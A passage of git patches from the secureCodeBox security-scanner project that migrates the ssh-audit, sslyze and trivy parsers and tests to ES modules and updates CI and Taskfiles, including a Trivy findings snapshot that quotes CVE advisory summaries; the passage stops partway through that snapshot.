b/.github/workflows/ci.yaml index e7436affee..fd116bbf89 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -430,7 +430,7 @@ jobs: - nuclei - screenshooter - semgrep - # - ssh-audit + - ssh-audit # - sslyze # - trivy # - trivy-sbom diff --git a/scanners/ssh-audit/Taskfile.yaml b/scanners/ssh-audit/Taskfile.yaml new file mode 100644 index 0000000000..bc1b410104 --- /dev/null +++ b/scanners/ssh-audit/Taskfile.yaml @@ -0,0 +1,16 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: ssh-audit + +tasks: + predeploy: + deps: + - demo-targets:deploy:dummy-ssh + cmds: [] diff --git a/scanners/ssh-audit/integration-tests/ssh-audit.test.js b/scanners/ssh-audit/integration-tests/ssh-audit.test.js index a938d987e1..6606022bda 100644 --- a/scanners/ssh-audit/integration-tests/ssh-audit.test.js +++ b/scanners/ssh-audit/integration-tests/ssh-audit.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(1); +import { scan } from "../../../tests/integration/helpers.js"; test( "ssh-audit should find a couple of findings for a dummy ssh service", @@ -30,7 +28,7 @@ test( } `); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); test( @@ -47,5 +45,5 @@ test( 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', ); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/ssh-audit/parser/parser.js b/scanners/ssh-audit/parser/parser.js index 7b1f8c87c1..274fb32bac 100644 --- a/scanners/ssh-audit/parser/parser.js +++ b/scanners/ssh-audit/parser/parser.js @@ -225,11 +225,17 @@ function isIPaddress(target) { * * Parses the raw results from the ssh-audit scanner into Findings */ -async function parse(fileContent) { - const host = fileContent; - if (typeof host === "string") return []; +export async function parse(fileContent) { + if (!fileContent) { + return []; + } - const destination = host.target.split(":"); + const report = JSON.parse(fileContent); + if (!report || !report.target) { + return []; + } + + const destination = report.target.split(":"); const location = "ssh://" + destination[0]; let ipAddress = null; let hostname = null; @@ -237,7 +243,7 @@ async function parse(fileContent) { ? (ipAddress = destination[0]) : (hostname = destination[0]); - const recommendationsArray = Object.entries(host.recommendations); + const recommendationsArray = Object.entries(report.recommendations); const policyViolationFindings = recommendationsArray.flatMap( ([recommendationSeverityLevel, value]) => transformRecommendationToFinding( @@ -260,18 +266,16 @@ async function parse(fileContent) { attributes: { hostname: hostname || null, ip_address: ipAddress || null, - server_banner: host.banner?.raw || null, - ssh_version: host.banner?.protocol || null, - ssh_lib_cpe: host.banner?.software, - key_algorithms: host.key, - encryption_algorithms: host.enc, - mac_algorithms: host.mac, - compression_algorithms: host.compression, - key_exchange_algorithms: host.kex, - fingerprints: host.fingerprints, + server_banner: report.banner?.raw || null, + ssh_version: report.banner?.protocol || null, + ssh_lib_cpe: report.banner?.software, + key_algorithms: report.key, + encryption_algorithms: report.enc, + mac_algorithms: report.mac, + compression_algorithms: report.compression, + key_exchange_algorithms: report.kex, + fingerprints: report.fingerprints, }, }; return [serviceFinding, ...policyViolationFindings]; } - -module.exports.parse = parse; diff --git a/scanners/ssh-audit/parser/parser.test.js b/scanners/ssh-audit/parser/parser.test.js index f00b9debe1..6bbc414ec2 100644 --- a/scanners/ssh-audit/parser/parser.test.js +++ b/scanners/ssh-audit/parser/parser.test.js @@ -2,22 +2,15 @@ // // SPDX-License-Identifier: Apache-2.0 -const fs = require("fs"); -const util = require("util"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const readFile = util.promisify(fs.readFile); - -const { parse } = require("./parser"); +import { parse } from "./parser"; test("ssh-audit parser parses a result into proper findings for dummy-ssh", async () => { - const hosts = JSON.parse( - await readFile(__dirname + "/__testFiles__/dummy-ssh.json", { - encoding: "utf8", - }), - ); + const hosts = await readFile(__dirname + "/__testFiles__/dummy-ssh.json", { + encoding: "utf8", + }); const findings = await parse(hosts); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` @@ -472,11 +465,9 @@ test("should properly parse empty json file", async () => { }); test("ssh-audit parser parses a result into proper findings for an example with given port", async () => { - const hosts = JSON.parse( - await readFile(__dirname + "/__testFiles__/portExample.json", { - encoding: "utf8", - }), - ); + const hosts = await readFile(__dirname + "/__testFiles__/portExample.json", { + encoding: "utf8", + }); const findings = await parse(hosts); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(` diff --git a/scanners/ssh-audit/scanner/Dockerfile b/scanners/ssh-audit/scanner/Dockerfile index 3e106874c9..f679a2a561 100644 --- a/scanners/ssh-audit/scanner/Dockerfile +++ b/scanners/ssh-audit/scanner/Dockerfile @@ -3,7 +3,7 @@ # SPDX-License-Identifier: Apache-2.0 # Base Image -ARG scannerVersion +ARG scannerVersion FROM positronsecurity/ssh-audit:${scannerVersion} COPY wrapper.sh /wrapper.sh From cfe8fad8096ee86a9b9c49d873cf284bb19514ac Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 15:52:58 +0200 Subject: [PATCH 074/137] Migrate sslyze to esm --- .github/workflows/ci.yaml | 2 +- scanners/sslyze/Taskfile.yaml | 16 ++++ .../sslyze/integration-tests/sslyze.test.js | 14 ++-- scanners/sslyze/parser/Dockerfile | 6 -- scanners/sslyze/parser/package-lock.json | 29 -------- .../sslyze/parser/package-lock.json.license | 3 - scanners/sslyze/parser/package.json | 14 ---- scanners/sslyze/parser/package.json.license | 3 - scanners/sslyze/parser/parser.js | 23 +++--- scanners/sslyze/parser/parser.test.js | 74 +++++++++---------- 10 files changed, 73 insertions(+), 111 deletions(-) create mode 100644 scanners/sslyze/Taskfile.yaml delete mode 100644 scanners/sslyze/parser/package-lock.json delete mode 100644 scanners/sslyze/parser/package-lock.json.license delete mode 100644 scanners/sslyze/parser/package.json delete mode 100644 scanners/sslyze/parser/package.json.license diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index fd116bbf89..59bfde45b4 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -431,7 +431,7 @@ jobs: - screenshooter - semgrep - ssh-audit - # - sslyze + - sslyze # - trivy # - trivy-sbom # - whatweb diff --git a/scanners/sslyze/Taskfile.yaml b/scanners/sslyze/Taskfile.yaml new file mode 100644 index 0000000000..b8e20928f8 --- /dev/null +++ b/scanners/sslyze/Taskfile.yaml @@ -0,0 +1,16 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: sslyze + +tasks: + predeploy: + deps: + - demo-targets:deploy:unsafe-https + cmds: [] diff --git a/scanners/sslyze/integration-tests/sslyze.test.js b/scanners/sslyze/integration-tests/sslyze.test.js index 90ad55f2eb..8014564257 100644 --- a/scanners/sslyze/integration-tests/sslyze.test.js +++ b/scanners/sslyze/integration-tests/sslyze.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "Sslyze scans the self-signed unsafe-https demo-target", @@ -31,15 +29,17 @@ test( } `); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); test( "Invalid argument should be marked as errored", async () => { await expect( - scan("sslyze-invalidArg", "sslyze", ["--invalidArg", "example.com"], 90), - ).rejects.toThrow("HTTP request failed"); + scan("sslyze-invalid-arg", "sslyze", ["--invalidArg", "example.com"], 90), + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', + ); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/sslyze/parser/Dockerfile b/scanners/sslyze/parser/Dockerfile index 0dbef28c20..449c709d29 100644 --- a/scanners/sslyze/parser/Dockerfile +++ b/scanners/sslyze/parser/Dockerfile @@ -4,13 +4,7 @@ ARG namespace ARG baseImageTag -FROM node:22-alpine AS build -RUN mkdir -p /home/app -WORKDIR /home/app -COPY package.json package-lock.json ./ -RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ -COPY --from=build --chown=root:root --chmod=755 /home/app/node_modules/ ./node_modules/ COPY --chown=root:root --chmod=755 ./parser.js ./parser.js diff --git a/scanners/sslyze/parser/package-lock.json b/scanners/sslyze/parser/package-lock.json deleted file mode 100644 index 6b070edcb2..0000000000 --- a/scanners/sslyze/parser/package-lock.json +++ /dev/null @@ -1,29 +0,0 @@ -{ - "name": "@securecodebox/parser-sslyze", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/parser-sslyze", - "version": "1.0.0", - "license": "Apache-2.0", - "dependencies": { - "sprintf-js": "^1.1.2" - }, - "devDependencies": {} - }, - "node_modules/sprintf-js": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.2.tgz", - "integrity": "sha512-VE0SOVEHCk7Qc8ulkWw3ntAzXuqf7S2lvwQaDLRnUeIEaKNQJzV6BwmLKhOqT61aGhfUMrXeaBk+oDGCzvhcug==" - } - }, - "dependencies": { - "sprintf-js": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.2.tgz", - "integrity": "sha512-VE0SOVEHCk7Qc8ulkWw3ntAzXuqf7S2lvwQaDLRnUeIEaKNQJzV6BwmLKhOqT61aGhfUMrXeaBk+oDGCzvhcug==" - } - } -} diff --git a/scanners/sslyze/parser/package-lock.json.license b/scanners/sslyze/parser/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/sslyze/parser/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/sslyze/parser/package.json b/scanners/sslyze/parser/package.json deleted file mode 100644 index adf62876f5..0000000000 --- a/scanners/sslyze/parser/package.json +++ /dev/null @@ -1,14 +0,0 @@ -{ - "name": "@securecodebox/parser-sslyze", - "version": "1.0.0", - "description": "Parses result files for the type: 'sslyze-json'", - "main": "", - "scripts": {}, - "keywords": [], - "author": "iteratec GmbH", - "license": "Apache-2.0", - "dependencies": { - "sprintf-js": "^1.1.2" - }, - "devDependencies": {} -} diff --git a/scanners/sslyze/parser/package.json.license b/scanners/sslyze/parser/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/sslyze/parser/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/sslyze/parser/parser.js b/scanners/sslyze/parser/parser.js index 04ce33e882..94989928ca 100644 --- a/scanners/sslyze/parser/parser.js +++ b/scanners/sslyze/parser/parser.js @@ -2,16 +2,19 @@ // // SPDX-License-Identifier: Apache-2.0 -function parse(fileContent) { +export function parse(fileContent) { + if (!fileContent) { + return []; + } + + const report = JSON.parse(fileContent); + // Only 0 when the target wasn't reachable - if ( - !fileContent.server_scan_results || - fileContent.server_scan_results.length === 0 - ) { + if (!report.server_scan_results || report.server_scan_results.length === 0) { return []; } - const serverScanResult = fileContent.server_scan_results[0]; + const serverScanResult = report.server_scan_results[0]; if (serverScanResult.connectivity_status == "ERROR") { console.error( @@ -22,12 +25,12 @@ function parse(fileContent) { if (process.env["DEBUG"] === "true") { console.log("Parsing Result File"); - console.log(JSON.stringify(fileContent)); + console.log(fileContent); } - if (fileContent.date_scans_completed) { + if (report.date_scans_completed) { serverScanResult.identified_at = new Date( - fileContent.date_scans_completed, + report.date_scans_completed, ).toISOString(); } @@ -59,8 +62,6 @@ function parse(fileContent) { return findings; } -module.exports.parse = parse; - // Returns the Scan Result for the individual TLS Versions as array function getTlsScanResultsAsArray(serverScanResult) { const commandResult = serverScanResult.scan_result; diff --git a/scanners/sslyze/parser/parser.test.js b/scanners/sslyze/parser/parser.test.js index 96adc39fbf..6acbb812c8 100644 --- a/scanners/sslyze/parser/parser.test.js +++ b/scanners/sslyze/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("parses result file for www.securecodebox.io correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/www.securecodebox.io.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/www.securecodebox.io.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); @@ -57,10 +56,11 @@ test("parses result file for www.securecodebox.io correctly", async () => { }); test("parses result file for tls-v1-0.badssl.com:1010 correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/tls-v1-0.badssl.com_1010.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/tls-v1-0.badssl.com_1010.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); @@ -162,10 +162,11 @@ test("parses result file for tls-v1-0.badssl.com:1010 correctly", async () => { }); test("parses result file for expired.badssl.com correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/expired.badssl.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/expired.badssl.com.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); @@ -284,10 +285,11 @@ test("parses result file for expired.badssl.com correctly", async () => { }); test("parses result file for wrong.host.badssl.com correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/wrong.host.badssl.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/wrong.host.badssl.com.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); @@ -405,13 +407,11 @@ test("parses result file for wrong.host.badssl.com correctly", async () => { }); test("parses result file for untrusted-root.badssl.com correctly", async () => { - const fileContent = JSON.parse( - await readFile( - __dirname + "/__testFiles__/untrusted-root.badssl.com.json", - { - encoding: "utf8", - }, - ), + const fileContent = await readFile( + __dirname + "/__testFiles__/untrusted-root.badssl.com.json", + { + encoding: "utf8", + }, ); const findings = await parse(fileContent); @@ -529,10 +529,11 @@ test("parses result file for untrusted-root.badssl.com correctly", async () => { }); test("parses result file for self-signed.badssl.com correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/self-signed.badssl.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/self-signed.badssl.com.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); @@ -650,13 +651,11 @@ test("parses result file for self-signed.badssl.com correctly", async () => { }); test("parses result file for target without certificate_deployments correctly", async () => { - const fileContent = JSON.parse( - await readFile( - __dirname + "/__testFiles__/no-certificate_deployments.json", - { - encoding: "utf8", - }, - ), + const fileContent = await readFile( + __dirname + "/__testFiles__/no-certificate_deployments.json", + { + encoding: "utf8", + }, ); const findings = await parse(fileContent); @@ -723,10 +722,11 @@ test("parses result file for target without certificate_deployments correctly", }); test("parses an empty result file correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/unavailable-host.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/unavailable-host.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent); From af9eb318c4a9178cfe92a1c583de4fc50f152f76 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 15:54:12 +0200 Subject: [PATCH 075/137] Fix skip spelling error --- .../git-repo-scanner/integration-tests/git-repo-scanner.test.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js index 5837913e99..7815274085 100644 --- a/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js +++ b/scanners/git-repo-scanner/integration-tests/git-repo-scanner.test.js @@ -4,7 +4,7 @@ import { scan } from "../../../tests/integration/helpers.js"; -test.sjip( +test.skip( "git-repo-scanner should find at least 1 repository in the GitHub secureCodeBox organisation", async () => { // This integration tests runs about 30min because of the GitHub Public API call rate limit. From 0704bafd1bfa846a91631962f22bdfcddd925573 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Wed, 2 Jul 2025 16:19:26 +0200 Subject: [PATCH 076/137] Migrate trivy & trivy-sbom to esm --- .github/workflows/ci.yaml | 4 +- scanners/Taskfile.yaml | 2 +- scanners/trivy-sbom/Taskfile.yaml | 10 + .../integration-tests/trivy-sbom.test.js | 16 +- scanners/trivy-sbom/parser/package-lock.json | 13 - .../parser/package-lock.json.license | 3 - scanners/trivy-sbom/parser/package.json | 9 - .../trivy-sbom/parser/package.json.license | 3 - scanners/trivy-sbom/parser/parser.js | 4 +- scanners/trivy-sbom/parser/parser.test.js | 15 +- scanners/trivy/Taskfile.yaml | 12 + .../trivy/integration-tests/trivy.test.js | 34 +- .../parser/__snapshots__/parser.test.js.snap | 117070 ++++++++------- scanners/trivy/parser/parser.js | 19 +- scanners/trivy/parser/parser.test.js | 71 +- 15 files changed, 58746 insertions(+), 58539 deletions(-) create mode 100644 scanners/trivy-sbom/Taskfile.yaml delete mode 100644 scanners/trivy-sbom/parser/package-lock.json delete mode 100644 scanners/trivy-sbom/parser/package-lock.json.license delete mode 100644 scanners/trivy-sbom/parser/package.json delete mode 100644 scanners/trivy-sbom/parser/package.json.license create mode 100644 scanners/trivy/Taskfile.yaml diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 59bfde45b4..06b24a0c1f 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -432,8 +432,8 @@ jobs: - semgrep - ssh-audit - sslyze - # - trivy - # - trivy-sbom + - trivy + - trivy-sbom # - whatweb # - wpscan - zap-automation-framework diff --git a/scanners/Taskfile.yaml b/scanners/Taskfile.yaml index 0602090c76..bf19bfccc1 100644 --- a/scanners/Taskfile.yaml +++ b/scanners/Taskfile.yaml @@ -140,7 +140,7 @@ tasks: - msg: "secureCodeBox operator is not deployed, run 'task prepare-testing-env' from project root dir first" sh: "kubectl get pods -n securecodebox-system | grep -q 'securecodebox-operator' || false" - msg: "{{ .scannerName }} scan type is not deployed, run 'task build deploy' from scanner dir first" - sh: "kubectl get scantypes {{ .scannerName }} -n integration-tests | grep -q '{{ .scannerName }}' || false" + sh: "helm -n integration-tests ls | grep -q '{{ .scannerName }}' || false" cmds: # Workaround for https://github.com/oven-sh/bun/issues/7332 - 'echo "Forwarding the Kubernetes API to localhost"' diff --git a/scanners/trivy-sbom/Taskfile.yaml b/scanners/trivy-sbom/Taskfile.yaml new file mode 100644 index 0000000000..e8a0759784 --- /dev/null +++ b/scanners/trivy-sbom/Taskfile.yaml @@ -0,0 +1,10 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: trivy-sbom + +tasks: {} diff --git a/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js b/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js index 935e462032..5c114a9e47 100644 --- a/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js +++ b/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "trivy-sbom image scan for juiceshop should create sbom", @@ -12,7 +10,7 @@ test( const { categories, severities, count } = await scan( "trivy-juice-test", "trivy-sbom-image", - ["bkimminich/juice-shop:v15.0.0"], + ["bkimminich/juice-shop:v18.0.0"], 90, ); @@ -20,7 +18,7 @@ test( expect(categories["SBOM"]).toEqual(1); expect(severities["informational"]).toEqual(1); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); test( @@ -28,12 +26,14 @@ test( async () => { await expect( scan( - "trivy-invalidArg", + "trivy-invalid-arg", "trivy-sbom-image", ["--invalidArg", "not/a-valid-image:v0.0.0"], 90, ), - ).rejects.toThrow("HTTP request failed"); + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', + ); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/trivy-sbom/parser/package-lock.json b/scanners/trivy-sbom/parser/package-lock.json deleted file mode 100644 index adef34980c..0000000000 --- a/scanners/trivy-sbom/parser/package-lock.json +++ /dev/null @@ -1,13 +0,0 @@ -{ - "name": "@securecodebox/parser-cyclonedx", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/parser-cyclonedx", - "version": "1.0.0", - "license": "Apache-2.0" - } - } -} diff --git a/scanners/trivy-sbom/parser/package-lock.json.license b/scanners/trivy-sbom/parser/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/trivy-sbom/parser/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/trivy-sbom/parser/package.json b/scanners/trivy-sbom/parser/package.json deleted file mode 100644 index bd85701561..0000000000 --- a/scanners/trivy-sbom/parser/package.json +++ /dev/null @@ -1,9 +0,0 @@ -{ - "name": "@securecodebox/parser-cyclonedx", - "version": "1.0.0", - "description": "Parses result files for the type: 'sbom-cyclonedx'.", - "main": "", - "scripts": {}, - "author": "the secureCodeBox authors", - "license": "Apache-2.0" -} diff --git a/scanners/trivy-sbom/parser/package.json.license b/scanners/trivy-sbom/parser/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/scanners/trivy-sbom/parser/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/scanners/trivy-sbom/parser/parser.js b/scanners/trivy-sbom/parser/parser.js index 58c535ea55..8056a4d1f7 100644 --- a/scanners/trivy-sbom/parser/parser.js +++ b/scanners/trivy-sbom/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(_fileContent, scan) { +export async function parse(_fileContent, scan) { const imageId = scan.spec.parameters[0]; const downloadLink = scan.status.rawResultDownloadLink; @@ -21,5 +21,3 @@ async function parse(_fileContent, scan) { }, ]; } - -module.exports.parse = parse; diff --git a/scanners/trivy-sbom/parser/parser.test.js b/scanners/trivy-sbom/parser/parser.test.js index 5b04c4b177..e5e016c992 100644 --- a/scanners/trivy-sbom/parser/parser.test.js +++ b/scanners/trivy-sbom/parser/parser.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; let scan; @@ -56,10 +54,11 @@ test("should create finding correctly", async () => { }); test("should properly parse cyclonedx json sbom file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/hello-world-cyclonedx.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/hello-world-cyclonedx.json", + { encoding: "utf8", - }), + }, ); const findings = await parse(fileContent, scan); // validate findings diff --git a/scanners/trivy/Taskfile.yaml b/scanners/trivy/Taskfile.yaml new file mode 100644 index 0000000000..bf35f38d12 --- /dev/null +++ b/scanners/trivy/Taskfile.yaml @@ -0,0 +1,12 @@ +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: trivy + additionalHelmInstallArgsForScanner: | + --set="k8sScanScope=cluster" \ + +tasks: {} diff --git a/scanners/trivy/integration-tests/trivy.test.js b/scanners/trivy/integration-tests/trivy.test.js index 0a61343437..8abd4d3f2a 100644 --- a/scanners/trivy/integration-tests/trivy.test.js +++ b/scanners/trivy/integration-tests/trivy.test.js @@ -2,17 +2,15 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); +import { scan } from "../../../tests/integration/helpers.js"; -jest.retryTimes(3); - -test.concurrent( +test( "trivy image scan for a vulnerable juiceshop demo target", async () => { const { categories, severities, count } = await scan( "trivy-juice-test", "trivy-image", - ["bkimminich/juice-shop:v10.2.0"], + ["bkimminich/juice-shop:v18.0.0"], 90, ); @@ -23,10 +21,10 @@ test.concurrent( expect(severities["medium"]).toBeGreaterThanOrEqual(10); expect(severities["low"]).toBeGreaterThanOrEqual(1); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); -test.concurrent( +test( "trivy filesystem scan with exiting files should not fail", async () => { const { categories, severities, count } = await scan( @@ -74,10 +72,10 @@ test.concurrent( expect(severities["high"]).toBeGreaterThanOrEqual(2); expect(severities["medium"]).toBeGreaterThanOrEqual(1); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); -test.concurrent( +test( "trivy repo scan with exiting repo should not fail", async () => { const { categories, severities, count } = await scan( @@ -91,24 +89,26 @@ test.concurrent( expect(severities["high"]).toBeGreaterThanOrEqual(2); expect(severities["medium"]).toBeGreaterThanOrEqual(1); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); -test.concurrent( +test( "Invalid argument should be marked as errored", async () => { await expect( scan( - "trivy-invalidArg", - "trivy", + "trivy-invalid-arg", + "trivy-image", ["--invalidArg", "not/a-valid-image:v0.0.0"], 90, ), - ).rejects.toThrow("HTTP request failed"); + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', + ); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); -test.concurrent( +test( "trivy k8s scan should not fail", async () => { const { categories, severities, count } = await scan( @@ -138,5 +138,5 @@ test.concurrent( expect(severityNames.includes("medium")).toBeTruthy(); expect(severityNames.includes("high")).toBeTruthy(); }, - 10 * 60 * 1000, + { timeout: 10 * 60 * 1000 }, ); diff --git a/scanners/trivy/parser/__snapshots__/parser.test.js.snap b/scanners/trivy/parser/__snapshots__/parser.test.js.snap index b7b5750a54..b9366b68f2 100644 --- a/scanners/trivy/parser/__snapshots__/parser.test.js.snap +++ b/scanners/trivy/parser/__snapshots__/parser.test.js.snap @@ -1,4 +1,4 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP +// Bun Snapshot v1, https://goo.gl/fbAQLP exports[`parses bkimminich/juice-shop:v10.2.0 result file into findings 1`] = ` [ @@ -7491,12 +7491,14 @@ exports[`parses bkimminich/juice-shop:v10.2.0 result file into findings 1`] = ` "vulnerabilityId": "GHSA-rvg8-pwq2-xj7q", }, "category": "NPM Package Vulnerability", - "description": "Versions of \`base64url\` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below. + "description": +"Versions of \`base64url\` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below. ## Recommendation -Update to version 3.0.0 or later.", +Update to version 3.0.0 or later." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package base64url to the fixed version: 3.0.0 or remove the package from the image.", "name": "Out-of-bounds Read in base64url", @@ -10706,9 +10708,11 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-25881", }, "category": "NPM Package Vulnerability", - "description": "This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. + "description": +"This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package http-cache-semantics to the fixed version: 4.1.1 or remove the package from the image.", "name": "http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability", @@ -10906,9 +10910,11 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-25881", }, "category": "NPM Package Vulnerability", - "description": "This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. + "description": +"This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package http-cache-semantics to the fixed version: 4.1.1 or remove the package from the image.", "name": "http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability", @@ -12015,8 +12021,10 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-23540", }, "category": "NPM Package Vulnerability", - "description": "In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 